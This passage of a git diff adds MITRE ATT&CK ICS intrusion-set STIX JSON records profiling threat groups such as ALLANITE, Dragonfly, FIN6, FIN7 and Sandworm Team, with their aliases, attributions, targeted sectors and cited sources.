+ }, + { + "source_name": "DOJ North Korea Indictment Feb 2021", + "url": "https://www.justice.gov/opa/pr/three-north-korean-military-hackers-indicted-wide-ranging-scheme-commit-cyberattacks-and", + "description": "Department of Justice. (2021, February 17). Three North Korean Military Hackers Indicted in Wide-Ranging Scheme to Commit Cyberattacks and Financial Crimes Across the Globe. Retrieved June 9, 2021." + }, + { + "description": "GReAT. (2017, April 3). Lazarus Under the Hood. Retrieved April 17, 2019.", + "url": "https://securelist.com/lazarus-under-the-hood/77908/", + "source_name": "Kaspersky Lazarus Under The Hood Blog 2017" + }, + { + "source_name": "SecureWorks NICKEL GLADSTONE profile Sept 2021", + "url": "https://www.secureworks.com/research/threat-profiles/nickel-gladstone", + "description": "SecureWorks. (2021, September 29). NICKEL GLADSTONE Threat Profile. Retrieved September 29, 2021." + }, + { + "source_name": "CrowdStrike Stardust Chollima Profile April 2018", + "url": "https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-april-stardust-chollima/", + "description": "Meyers, Adam. (2018, April 6). Meet CrowdStrike\u2019s Adversary of the Month for April: STARDUST CHOLLIMA. Retrieved September 29, 2021." + }, + { + "source_name": "CrowdStrike GTR 2021 June 2021", + "url": "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", + "description": "CrowdStrike. (2021, June 7). CrowdStrike 2021 Global Threat Report. Retrieved September 29, 2021." 
+ } + ], + "modified": "2022-01-18T17:13:14.610Z", + "name": "APT38", + "description": "[APT38](https://attack.mitre.org/groups/G0082) is a North Korean state-sponsored threat group that specializes in financial cyber operations; it has been attributed to the Reconnaissance General Bureau.(Citation: CISA AA20-239A BeagleBoyz August 2020) Active since at least 2014, [APT38](https://attack.mitre.org/groups/G0082) has targeted banks, financial institutions, casinos, cryptocurrency exchanges, SWIFT system endpoints, and ATMs in at least 38 countries worldwide. Significant operations include the 2016 Bank of Bangladesh heist, during which [APT38](https://attack.mitre.org/groups/G0082) stole $81 million, as well as attacks against Bancomext (2018) and Banco de Chile (2018); some of their attacks have been destructive.(Citation: CISA AA20-239A BeagleBoyz August 2020)(Citation: FireEye APT38 Oct 2018)(Citation: DOJ North Korea Indictment Feb 2021)(Citation: Kaspersky Lazarus Under The Hood Blog 2017)\n\nNorth Korean group definitions are known to have significant overlap, and some security researchers report all North Korean state-sponsored cyber activity under the name [Lazarus Group](https://attack.mitre.org/groups/G0032) instead of tracking clusters or subgroups.", + "x_mitre_version": "2.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/intrusion-set/intrusion-set--190242d7-73fc-4738-af68-20162f7a5aae.json b/cti-ATT-CK-v13.1/ics-attack/intrusion-set/intrusion-set--190242d7-73fc-4738-af68-20162f7a5aae.json new file mode 100644 index 0000000000000000000000000000000000000000..8d28fe5fe2e72e37bf823df795ac8706c8dba87d --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/intrusion-set/intrusion-set--190242d7-73fc-4738-af68-20162f7a5aae.json 
@@ -0,0 +1,46 @@ +{ + "type": "bundle", + "id": "bundle--bb0972a5-450a-4e6d-b585-e3b2a771a600", + "spec_version": "2.0", + "objects": [ + { + "aliases": [ + "ALLANITE", + "Palmetto Fusion" + ], + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_contributors": [ + "Dragos Threat Intelligence" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "intrusion-set", + "id": "intrusion-set--190242d7-73fc-4738-af68-20162f7a5aae", + "created": "2017-05-31T21:31:57.307Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "G1000", + "url": "https://attack.mitre.org/groups/G1000" + }, + { + "source_name": "Dragos", + "url": "https://dragos.com/resource/allanite/", + "description": "Dragos Allanite Retrieved. 2019/10/27 " + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[ALLANITE](https://attack.mitre.org/groups/G1000) is a suspected Russian cyber espionage group, that has primarily targeted the electric utility sector within the United States and United Kingdom. The group's tactics and techniques are reportedly similar to [Dragonfly](https://attack.mitre.org/groups/G0035), although [ALLANITE](https://attack.mitre.org/groups/G1000)s technical capabilities have not exhibited disruptive or destructive abilities. It has been suggested that the group maintains a presence in ICS for the purpose of gaining understanding of processes and to maintain persistence. (Citation: Dragos)", + "modified": "2022-05-24T19:26:10.721Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "ALLANITE", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/ics-attack/intrusion-set/intrusion-set--1c63d4ec-0a75-4daa-b1df-0d11af3d3cc1.json b/cti-ATT-CK-v13.1/ics-attack/intrusion-set/intrusion-set--1c63d4ec-0a75-4daa-b1df-0d11af3d3cc1.json new file mode 100644 index 0000000000000000000000000000000000000000..f4ea7a1436425a6f27ab0cf287327f70b746cfb4 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/intrusion-set/intrusion-set--1c63d4ec-0a75-4daa-b1df-0d11af3d3cc1.json 
@@ -0,0 +1,145 @@ +{ + "type": "bundle", + "id": "bundle--59720d00-615e-4878-b5ab-736e626221c9", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-08T22:03:28.170Z", + "name": "Dragonfly", + "description": "[Dragonfly](https://attack.mitre.org/groups/G0035) is a cyber espionage group that has been attributed to Russia's Federal Security Service (FSB) Center 16.(Citation: DOJ Russia Targeting Critical Infrastructure March 2022)(Citation: UK GOV FSB Factsheet April 2022) Active since at least 2010, [Dragonfly](https://attack.mitre.org/groups/G0035) has targeted defense and aviation companies, government entities, companies related to industrial control systems, and critical infrastructure sectors worldwide through supply chain, spearphishing, and drive-by compromise attacks.(Citation: Symantec Dragonfly)(Citation: Secureworks IRON LIBERTY July 2019)(Citation: Symantec Dragonfly Sept 2017)(Citation: Fortune Dragonfly 2.0 Sept 2017)(Citation: Gigamon Berserk Bear October 2021)(Citation: CISA AA20-296A Berserk Bear December 2020)(Citation: Symantec Dragonfly 2.0 October 2017)", + "aliases": [ + "Dragonfly", + "TEMP.Isotope", + "DYMALLOY", + "Berserk Bear", + "TG-4192", + "Crouching Yeti", + "IRON LIBERTY", + "Energetic Bear" + ], + "x_mitre_deprecated": false, + "x_mitre_version": "3.1", + "x_mitre_contributors": [ + "Dragos Threat Intelligence" + ], + "type": "intrusion-set", + "id": "intrusion-set--1c63d4ec-0a75-4daa-b1df-0d11af3d3cc1", + "created": "2017-05-31T21:32:05.217Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0035", + "external_id": "G0035" + }, + { + "source_name": "DYMALLOY", + "description": "(Citation: Dragos DYMALLOY )(Citation: UK GOV FSB Factsheet April 2022)" + }, + { + "source_name": "Berserk Bear", + "description": "(Citation: Gigamon Berserk Bear October 2021)(Citation: DOJ 
Russia Targeting Critical Infrastructure March 2022)(Citation: UK GOV FSB Factsheet April 2022)" + }, + { + "source_name": "TEMP.Isotope", + "description": "(Citation: Mandiant Ukraine Cyber Threats January 2022)(Citation: Gigamon Berserk Bear October 2021)" + }, + { + "source_name": "Crouching Yeti", + "description": "(Citation: Secureworks IRON LIBERTY July 2019)(Citation: Gigamon Berserk Bear October 2021)(Citation: DOJ Russia Targeting Critical Infrastructure March 2022)(Citation: UK GOV FSB Factsheet April 2022)" + }, + { + "source_name": "IRON LIBERTY", + "description": "(Citation: Secureworks IRON LIBERTY July 2019)(Citation: Secureworks MCMD July 2019)(Citation: Secureworks Karagany July 2019)(Citation: UK GOV FSB Factsheet April 2022)" + }, + { + "source_name": "TG-4192", + "description": "(Citation: Secureworks IRON LIBERTY July 2019)(Citation: UK GOV FSB Factsheet April 2022)" + }, + { + "source_name": "Dragonfly", + "description": "(Citation: Symantec Dragonfly)(Citation: Secureworks IRON LIBERTY July 2019)(Citation: Gigamon Berserk Bear October 2021)(Citation: DOJ Russia Targeting Critical Infrastructure March 2022)(Citation: UK GOV FSB Factsheet April 2022)" + }, + { + "source_name": "Energetic Bear", + "description": "(Citation: Symantec Dragonfly)(Citation: Secureworks IRON LIBERTY July 2019)(Citation: Secureworks MCMD July 2019)(Citation: Secureworks Karagany July 2019)(Citation: Gigamon Berserk Bear October 2021)(Citation: DOJ Russia Targeting Critical Infrastructure March 2022)(Citation: UK GOV FSB Factsheet April 2022)" + }, + { + "source_name": "CISA AA20-296A Berserk Bear December 2020", + "description": "CISA. (2020, December 1). Russian State-Sponsored Advanced Persistent Threat Actor Compromises U.S. Government Targets. 
Retrieved December 9, 2021.", + "url": "https://www.cisa.gov/uscert/ncas/alerts/aa20-296a#revisions" + }, + { + "source_name": "DOJ Russia Targeting Critical Infrastructure March 2022", + "description": "Department of Justice. (2022, March 24). Four Russian Government Employees Charged in Two Historical Hacking Campaigns Targeting Critical Infrastructure Worldwide. Retrieved April 5, 2022.", + "url": "https://www.justice.gov/opa/pr/four-russian-government-employees-charged-two-historical-hacking-campaigns-targeting-critical" + }, + { + "source_name": "Dragos DYMALLOY ", + "description": "Dragos. (n.d.). DYMALLOY. Retrieved August 20, 2020.", + "url": "https://www.dragos.com/threat/dymalloy/" + }, + { + "source_name": "Fortune Dragonfly 2.0 Sept 2017", + "description": "Hackett, R. (2017, September 6). Hackers Have Penetrated Energy Grid, Symantec Warns. Retrieved June 6, 2018.", + "url": "http://fortune.com/2017/09/06/hack-energy-grid-symantec/" + }, + { + "source_name": "Mandiant Ukraine Cyber Threats January 2022", + "description": "Hultquist, J. (2022, January 20). Anticipating Cyber Threats as the Ukraine Crisis Escalates. Retrieved January 24, 2022.", + "url": "https://www.mandiant.com/resources/ukraine-crisis-cyber-threats" + }, + { + "source_name": "Secureworks MCMD July 2019", + "description": "Secureworks. (2019, July 24). MCMD Malware Analysis. Retrieved August 13, 2020.", + "url": "https://www.secureworks.com/research/mcmd-malware-analysis" + }, + { + "source_name": "Secureworks IRON LIBERTY July 2019", + "description": "Secureworks. (2019, July 24). Resurgent Iron Liberty Targeting Energy Sector. Retrieved August 12, 2020.", + "url": "https://www.secureworks.com/research/resurgent-iron-liberty-targeting-energy-sector" + }, + { + "source_name": "Secureworks Karagany July 2019", + "description": "Secureworks. (2019, July 24). Updated Karagany Malware Targets Energy Sector. 
Retrieved August 12, 2020.", + "url": "https://www.secureworks.com/research/updated-karagany-malware-targets-energy-sector" + }, + { + "source_name": "Gigamon Berserk Bear October 2021", + "description": "Slowik, J. (2021, October). THE BAFFLING BERSERK BEAR: A DECADE\u2019S ACTIVITY TARGETING CRITICAL INFRASTRUCTURE. Retrieved December 6, 2021.", + "url": "https://vblocalhost.com/uploads/VB2021-Slowik.pdf" + }, + { + "source_name": "Symantec Dragonfly Sept 2017", + "description": "Symantec Security Response. (2014, July 7). Dragonfly: Western energy sector targeted by sophisticated attack group. Retrieved September 9, 2017.", + "url": "https://docs.broadcom.com/doc/dragonfly_threat_against_western_energy_suppliers" + }, + { + "source_name": "Symantec Dragonfly", + "description": "Symantec Security Response. (2014, June 30). Dragonfly: Cyberespionage Attacks Against Energy Suppliers. Retrieved April 8, 2016.", + "url": "https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=7382dce7-0260-4782-84cc-890971ed3f17&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments" + }, + { + "source_name": "Symantec Dragonfly 2.0 October 2017", + "description": "Symantec. (2017, October 7). Dragonfly: Western energy sector targeted by sophisticated attack group. Retrieved April 19, 2022.", + "url": "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/dragonfly-energy-sector-cyber-attacks" + }, + { + "source_name": "UK GOV FSB Factsheet April 2022", + "description": "UK Gov. (2022, April 5). Russia's FSB malign activity: factsheet. 
Retrieved April 5, 2022.", + "url": "https://www.gov.uk/government/publications/russias-fsb-malign-cyber-activity-factsheet/russias-fsb-malign-activity-factsheet" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_domains": [ + "enterprise-attack", + "ics-attack" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/intrusion-set/intrusion-set--2a7914cf-dff3-428d-ab0f-1014d1c28aeb.json b/cti-ATT-CK-v13.1/ics-attack/intrusion-set/intrusion-set--2a7914cf-dff3-428d-ab0f-1014d1c28aeb.json new file mode 100644 index 0000000000000000000000000000000000000000..034ce703c2cc17f8d2dda76dc47145cfbdb8a016 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/intrusion-set/intrusion-set--2a7914cf-dff3-428d-ab0f-1014d1c28aeb.json 
@@ -0,0 +1,86 @@ +{ + "type": "bundle", + "id": "bundle--f63836fc-0e73-477e-9a42-5c51c1519324", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-22T03:50:17.471Z", + "name": "FIN6", + "description": "[FIN6](https://attack.mitre.org/groups/G0037) is a cyber crime group that has stolen payment card data and sold it for profit on underground marketplaces. This group has aggressively targeted and compromised point of sale (PoS) systems in the hospitality and retail sectors.(Citation: FireEye FIN6 April 2016)(Citation: FireEye FIN6 Apr 2019)", + "aliases": [ + "FIN6", + "Magecart Group 6", + "ITG08", + "Skeleton Spider" + ], + "x_mitre_deprecated": false, + "x_mitre_version": "3.3", + "x_mitre_contributors": [ + "Center for Threat-Informed Defense (CTID)", + "Drew Church, Splunk" + ], + "type": "intrusion-set", + "id": "intrusion-set--2a7914cf-dff3-428d-ab0f-1014d1c28aeb", + "created": "2017-05-31T21:32:06.015Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0037", + "external_id": "G0037" + }, + { + "source_name": "Skeleton Spider", + "description": "(Citation: Crowdstrike Global Threat Report Feb 2018)" + }, + { + "source_name": "FIN6", + "description": "(Citation: FireEye FIN6 April 2016)" + }, + { + "source_name": "Magecart Group 6", + "description": "(Citation: Security Intelligence ITG08 April 2020)" + }, + { + "source_name": "ITG08", + "description": "(Citation: Security Intelligence More Eggs Aug 2019)" + }, + { + "source_name": "Crowdstrike Global Threat Report Feb 2018", + "description": "CrowdStrike. (2018, February 26). CrowdStrike 2018 Global Threat Report. Retrieved October 10, 2018.", + "url": "https://crowdstrike.lookbookhq.com/global-threat-report-2018-web/cs-2018-global-threat-report" + }, + { + "source_name": "FireEye FIN6 April 2016", + "description": "FireEye Threat Intelligence. 
(2016, April). Follow the Money: Dissecting the Operations of the Cyber Crime Group FIN6. Retrieved June 1, 2016.", + "url": "https://www2.fireeye.com/rs/848-DID-242/images/rpt-fin6.pdf" + }, + { + "source_name": "FireEye FIN6 Apr 2019", + "description": "McKeague, B. et al. (2019, April 5). Pick-Six: Intercepting a FIN6 Intrusion, an Actor Recently Tied to Ryuk and LockerGoga Ransomware. Retrieved April 17, 2019.", + "url": "https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html" + }, + { + "source_name": "Security Intelligence ITG08 April 2020", + "description": "Villadsen, O. (2020, April 7). ITG08 (aka FIN6) Partners With TrickBot Gang, Uses Anchor Framework. Retrieved October 8, 2020.", + "url": "https://securityintelligence.com/posts/itg08-aka-fin6-partners-with-trickbot-gang-uses-anchor-framework/" + }, + { + "source_name": "Security Intelligence More Eggs Aug 2019", + "description": "Villadsen, O.. (2019, August 29). More_eggs, Anyone? Threat Actor ITG08 Strikes Again. Retrieved September 16, 2019.", + "url": "https://securityintelligence.com/posts/more_eggs-anyone-threat-actor-itg08-strikes-again/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_domains": [ + "enterprise-attack", + "ics-attack" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/intrusion-set/intrusion-set--3753cc21-2dae-4dfb-8481-d004e74502cc.json b/cti-ATT-CK-v13.1/ics-attack/intrusion-set/intrusion-set--3753cc21-2dae-4dfb-8481-d004e74502cc.json new file mode 100644 index 0000000000000000000000000000000000000000..9b4e559e2a54956a1a9f55ff27b915cec639070a --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/intrusion-set/intrusion-set--3753cc21-2dae-4dfb-8481-d004e74502cc.json 
@@ -0,0 +1,105 @@ +{ + "type": "bundle", + "id": "bundle--c927b2ed-c149-416c-bf1c-a70469663b37", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-22T03:51:04.185Z", + "name": "FIN7", + "description": "[FIN7](https://attack.mitre.org/groups/G0046) is a financially-motivated threat group that has been active since 2013 primarily targeting the U.S. retail, restaurant, and hospitality sectors, often using point-of-sale malware. A portion of [FIN7](https://attack.mitre.org/groups/G0046) was run out of a front company called Combi Security. Since 2020 [FIN7](https://attack.mitre.org/groups/G0046) shifted operations to a big game hunting (BGH) approach including use of [REvil](https://attack.mitre.org/software/S0496) ransomware and their own Ransomware as a Service (RaaS), Darkside. [FIN7](https://attack.mitre.org/groups/G0046) may be linked to the [Carbanak](https://attack.mitre.org/groups/G0008) Group, but there appears to be several groups using [Carbanak](https://attack.mitre.org/software/S0030) malware and are therefore tracked separately.(Citation: FireEye FIN7 March 2017)(Citation: FireEye FIN7 April 2017)(Citation: FireEye CARBANAK June 2017)(Citation: FireEye FIN7 Aug 2018)(Citation: CrowdStrike Carbon Spider August 2021)", + "aliases": [ + "FIN7", + "GOLD NIAGARA", + "ITG14", + "Carbon Spider" + ], + "x_mitre_deprecated": false, + "x_mitre_version": "2.2", + "x_mitre_contributors": [ + "Edward Millington" + ], + "type": "intrusion-set", + "id": "intrusion-set--3753cc21-2dae-4dfb-8481-d004e74502cc", + "created": "2017-05-31T21:32:09.460Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0046", + "external_id": "G0046" + }, + { + "source_name": "Carbon Spider", + "description": "(Citation: CrowdStrike Carbon Spider August 2021)" + }, + { + "source_name": "FIN7", + "description": "(Citation: FireEye 
FIN7 March 2017) (Citation: FireEye FIN7 April 2017) (Citation: Morphisec FIN7 June 2017) (Citation: FireEye FIN7 Shim Databases) (Citation: FireEye FIN7 Aug 2018)" + }, + { + "source_name": "GOLD NIAGARA", + "description": "(Citation: Secureworks GOLD NIAGARA Threat Profile)" + }, + { + "source_name": "FireEye CARBANAK June 2017", + "description": "Bennett, J., Vengerik, B. (2017, June 12). Behind the CARBANAK Backdoor. Retrieved June 11, 2018.", + "url": "https://www.fireeye.com/blog/threat-research/2017/06/behind-the-carbanak-backdoor.html" + }, + { + "source_name": "FireEye FIN7 April 2017", + "description": "Carr, N., et al. (2017, April 24). FIN7 Evolution and the Phishing LNK. Retrieved April 24, 2017.", + "url": "https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html" + }, + { + "source_name": "FireEye FIN7 Aug 2018", + "description": "Carr, N., et al. (2018, August 01). On the Hunt for FIN7: Pursuing an Enigmatic and Evasive Global Criminal Operation. Retrieved August 23, 2018.", + "url": "https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html" + }, + { + "source_name": "Secureworks GOLD NIAGARA Threat Profile", + "description": "CTU. (n.d.). GOLD NIAGARA. Retrieved September 21, 2021.", + "url": "https://www.secureworks.com/research/threat-profiles/gold-niagara" + }, + { + "source_name": "FireEye FIN7 Shim Databases", + "description": "Erickson, J., McWhirt, M., Palombo, D. (2017, May 3). To SDB, Or Not To SDB: FIN7 Leveraging Shim Databases for Persistence. Retrieved July 18, 2017.", + "url": "https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html" + }, + { + "source_name": "Morphisec FIN7 June 2017", + "description": "Gorelik, M.. (2017, June 9). FIN7 Takes Another Bite at the Restaurant Industry. 
Retrieved July 13, 2017.", + "url": "http://blog.morphisec.com/fin7-attacks-restaurant-industry" + }, + { + "source_name": "ITG14", + "description": "ITG14 shares campaign overlap with [FIN7](https://attack.mitre.org/groups/G0046).(Citation: IBM Ransomware Trends September 2020)" + }, + { + "source_name": "CrowdStrike Carbon Spider August 2021", + "description": "Loui, E. and Reynolds, J. (2021, August 30). CARBON SPIDER Embraces Big Game Hunting, Part 1. Retrieved September 20, 2021.", + "url": "https://www.crowdstrike.com/blog/carbon-spider-embraces-big-game-hunting-part-1/" + }, + { + "source_name": "FireEye FIN7 March 2017", + "description": "Miller, S., et al. (2017, March 7). FIN7 Spear Phishing Campaign Targets Personnel Involved in SEC Filings. Retrieved March 8, 2017.", + "url": "https://web.archive.org/web/20180808125108/https:/www.fireeye.com/blog/threat-research/2017/03/fin7_spear_phishing.html" + }, + { + "source_name": "IBM Ransomware Trends September 2020", + "description": "Singleton, C. and Kiefer, C. (2020, September 28). Ransomware 2020: Attack Trends Affecting Organizations Worldwide. Retrieved September 20, 2021.", + "url": "https://securityintelligence.com/posts/ransomware-2020-attack-trends-new-techniques-affecting-organizations-worldwide/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_domains": [ + "enterprise-attack", + "ics-attack" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/intrusion-set/intrusion-set--381fcf73-60f6-4ab2-9991-6af3cbc35192.json b/cti-ATT-CK-v13.1/ics-attack/intrusion-set/intrusion-set--381fcf73-60f6-4ab2-9991-6af3cbc35192.json new file mode 100644 index 0000000000000000000000000000000000000000..78c016477b67a2dca0b7a0f3d131c0d4b9a47170 --- /dev/null 
+++ b/cti-ATT-CK-v13.1/ics-attack/intrusion-set/intrusion-set--381fcf73-60f6-4ab2-9991-6af3cbc35192.json 
@@ -0,0 +1,141 @@ +{ + "type": "bundle", + "id": "bundle--8b7af9cc-74d3-4224-9d6b-8270ac0079a8", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-08T22:12:31.238Z", + "name": "Sandworm Team", + "description": "[Sandworm Team](https://attack.mitre.org/groups/G0034) is a destructive threat group that has been attributed to Russia's General Staff Main Intelligence Directorate (GRU) Main Center for Special Technologies (GTsST) military unit 74455.(Citation: US District Court Indictment GRU Unit 74455 October 2020)(Citation: UK NCSC Olympic Attacks October 2020) This group has been active since at least 2009.(Citation: iSIGHT Sandworm 2014)(Citation: CrowdStrike VOODOO BEAR)(Citation: USDOJ Sandworm Feb 2020)(Citation: NCSC Sandworm Feb 2020)\n\nIn October 2020, the US indicted six GRU Unit 74455 officers associated with [Sandworm Team](https://attack.mitre.org/groups/G0034) for the following cyber operations: the 2015 and 2016 attacks against Ukrainian electrical companies and government organizations, the 2017 worldwide [NotPetya](https://attack.mitre.org/software/S0368) attack, targeting of the 2017 French presidential campaign, the 2018 [Olympic Destroyer](https://attack.mitre.org/software/S0365) attack against the Winter Olympic Games, the 2018 operation against the Organisation for the Prohibition of Chemical Weapons, and attacks against the country of Georgia in 2018 and 2019.(Citation: US District Court Indictment GRU Unit 74455 October 2020)(Citation: UK NCSC Olympic Attacks October 2020) Some of these were conducted with the assistance of GRU Unit 26165, which is also referred to as [APT28](https://attack.mitre.org/groups/G0007).(Citation: US District Court Indictment GRU Oct 2018)", + "aliases": [ + "Sandworm Team", + "ELECTRUM", + "Telebots", + "IRON VIKING", + "BlackEnergy (Group)", + "Quedagh", + "Voodoo Bear", + "IRIDIUM" + ], + "x_mitre_deprecated": false, + "x_mitre_version": "3.0", + "x_mitre_contributors": [ + "Dragos Threat 
Intelligence" + ], + "type": "intrusion-set", + "id": "intrusion-set--381fcf73-60f6-4ab2-9991-6af3cbc35192", + "created": "2017-05-31T21:32:04.588Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0034", + "external_id": "G0034" + }, + { + "source_name": "Voodoo Bear", + "description": "(Citation: CrowdStrike VOODOO BEAR)(Citation: US District Court Indictment GRU Unit 74455 October 2020)(Citation: UK NCSC Olympic Attacks October 2020)" + }, + { + "source_name": "ELECTRUM", + "description": "(Citation: Dragos ELECTRUM)(Citation: UK NCSC Olympic Attacks October 2020)" + }, + { + "source_name": "Sandworm Team", + "description": "(Citation: iSIGHT Sandworm 2014) (Citation: F-Secure BlackEnergy 2014) (Citation: InfoSecurity Sandworm Oct 2014)(Citation: US District Court Indictment GRU Unit 74455 October 2020)(Citation: UK NCSC Olympic Attacks October 2020)" + }, + { + "source_name": "Quedagh", + "description": "(Citation: iSIGHT Sandworm 2014) (Citation: F-Secure BlackEnergy 2014)(Citation: UK NCSC Olympic Attacks October 2020)" + }, + { + "source_name": "IRIDIUM", + "description": "(Citation: Microsoft Prestige ransomware October 2022)" + }, + { + "source_name": "BlackEnergy (Group)", + "description": "(Citation: NCSC Sandworm Feb 2020)(Citation: UK NCSC Olympic Attacks October 2020)" + }, + { + "source_name": "Telebots", + "description": "(Citation: NCSC Sandworm Feb 2020)(Citation: US District Court Indictment GRU Unit 74455 October 2020)(Citation: UK NCSC Olympic Attacks October 2020)" + }, + { + "source_name": "IRON VIKING", + "description": "(Citation: Secureworks IRON VIKING )(Citation: US District Court Indictment GRU Unit 74455 October 2020)(Citation: UK NCSC Olympic Attacks October 2020)" + }, + { + "source_name": "US District Court Indictment GRU Oct 2018", + "description": "Brady, S . (2018, October 3). 
Indictment - United States vs Aleksei Sergeyevich Morenets, et al.. Retrieved October 1, 2020.", + "url": "https://www.justice.gov/opa/page/file/1098481/download" + }, + { + "source_name": "Dragos ELECTRUM", + "description": "Dragos. (2017, January 1). ELECTRUM Threat Profile. Retrieved June 10, 2020.", + "url": "https://www.dragos.com/resource/electrum/" + }, + { + "source_name": "F-Secure BlackEnergy 2014", + "description": "F-Secure Labs. (2014). BlackEnergy & Quedagh: The convergence of crimeware and APT attacks. Retrieved March 24, 2016.", + "url": "https://blog-assets.f-secure.com/wp-content/uploads/2019/10/15163408/BlackEnergy_Quedagh.pdf" + }, + { + "source_name": "iSIGHT Sandworm 2014", + "description": "Hultquist, J.. (2016, January 7). Sandworm Team and the Ukrainian Power Authority Attacks. Retrieved October 6, 2017.", + "url": "https://www.fireeye.com/blog/threat-research/2016/01/ukraine-and-sandworm-team.html" + }, + { + "source_name": "CrowdStrike VOODOO BEAR", + "description": "Meyers, A. (2018, January 19). Meet CrowdStrike\u2019s Adversary of the Month for January: VOODOO BEAR. Retrieved May 22, 2018.", + "url": "https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-january-voodoo-bear/" + }, + { + "source_name": "Microsoft Prestige ransomware October 2022", + "description": "MSTIC. (2022, October 14). New \u201cPrestige\u201d ransomware impacts organizations in Ukraine and Poland. Retrieved January 19, 2023.", + "url": "https://www.microsoft.com/en-us/security/blog/2022/10/14/new-prestige-ransomware-impacts-organizations-in-ukraine-and-poland/" + }, + { + "source_name": "InfoSecurity Sandworm Oct 2014", + "description": "Muncaster, P.. (2014, October 14). Microsoft Zero Day Traced to Russian \u2018Sandworm\u2019 Hackers. Retrieved October 6, 2017.", + "url": "https://www.infosecurity-magazine.com/news/microsoft-zero-day-traced-russian/" + }, + { + "source_name": "NCSC Sandworm Feb 2020", + "description": "NCSC. 
(2020, February 20). NCSC supports US advisory regarding GRU intrusion set Sandworm. Retrieved June 10, 2020.", + "url": "https://www.ncsc.gov.uk/news/ncsc-supports-sandworm-advisory" + }, + { + "source_name": "USDOJ Sandworm Feb 2020", + "description": "Pompeo, M. (2020, February 20). The United States Condemns Russian Cyber Attack Against the Country of Georgia. Retrieved June 18, 2020.", + "url": "https://2017-2021.state.gov/the-united-states-condemns-russian-cyber-attack-against-the-country-of-georgia//index.html" + }, + { + "source_name": "US District Court Indictment GRU Unit 74455 October 2020", + "description": "Scott W. Brady. (2020, October 15). United States vs. Yuriy Sergeyevich Andrienko et al.. Retrieved November 25, 2020.", + "url": "https://www.justice.gov/opa/press-release/file/1328521/download" + }, + { + "source_name": "Secureworks IRON VIKING ", + "description": "Secureworks. (2020, May 1). IRON VIKING Threat Profile. Retrieved June 10, 2020.", + "url": "https://www.secureworks.com/research/threat-profiles/iron-viking" + }, + { + "source_name": "UK NCSC Olympic Attacks October 2020", + "description": "UK NCSC. (2020, October 19). UK exposes series of Russian cyber attacks against Olympic and Paralympic Games . Retrieved November 30, 2020.", + "url": "https://www.gov.uk/government/news/uk-exposes-series-of-russian-cyber-attacks-against-olympic-and-paralympic-games" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_domains": [ + "ics-attack", + "enterprise-attack", + "mobile-attack" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": 